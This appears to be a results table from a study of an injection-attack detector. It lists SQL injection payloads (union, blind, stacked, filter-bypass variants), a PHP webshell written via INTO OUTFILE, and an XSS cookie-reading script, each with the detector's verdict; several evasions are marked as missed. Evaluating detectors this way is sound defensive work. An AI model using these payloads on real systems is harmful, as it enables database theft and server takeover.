|
Payload | Description | Detection results |
|
id = 1 union select 1,2,group_concat (table_name), 3 from information_schema.tables where table_schema = database() | Union select injections | Malicious |
id = 1′ and ascii(substr (database(),1,1)) > 114 | Boolean-based BLIND injections | Malicious |
id = 1′ and if (ascii(substr (database(),1,1)) > 114, sleep (3),null) | Time-based BLIND injectionst | Malicious |
id = 1′ union select 1,2,”<?php @eval ($_GET[‘string’])?>” into outfile xxx.php | Webshell | Malicious |
id = 1′^ (ascii (mid ((select (GROUP_CONCAT (TABLE_NAME))from (information_schema.TABLES)where (TABLE_SCHEMA = database())),1,1)) = 1) = ’1′ | Bypassing blacklist filters stripping SPACES | Malicious |
Set @a = concat (‘selec’,‘t from xxx’); prepare h from @a; execute @a; | Stacked SQL injections | Malicious |
Set @a = 0x73656c656374202a2066726f6d20787878;prepare h from @a;execute @a; | Stacked SQL injections and hexadecimal execution bypasses string filtering | Normal1 |
?id = −1 union select group_concat (`123`),2 from (select 123 union select from flag)a | Bypassing blacklist filters stripping OR | Malicious |
id = 1 unionunion selectselect 1,2,group_concat (table_name),3 from information_schema.tables where table_schema = database() | Double writing bypasses UNION and SELECT filtering | Malicious |
M!T!@MzIGF.@[email protected].@[email protected]@[email protected]@.zZXI!oKSksM!S!.k. = | Insert special characters “!, @,.” in based64 encoding to bypass string filtering | Normal1 |
Select and union and order by | Benign statements embedding potentially harmful words | Normal |
<script >alert (document.cookie);</script > | XSS | Normal1 |
|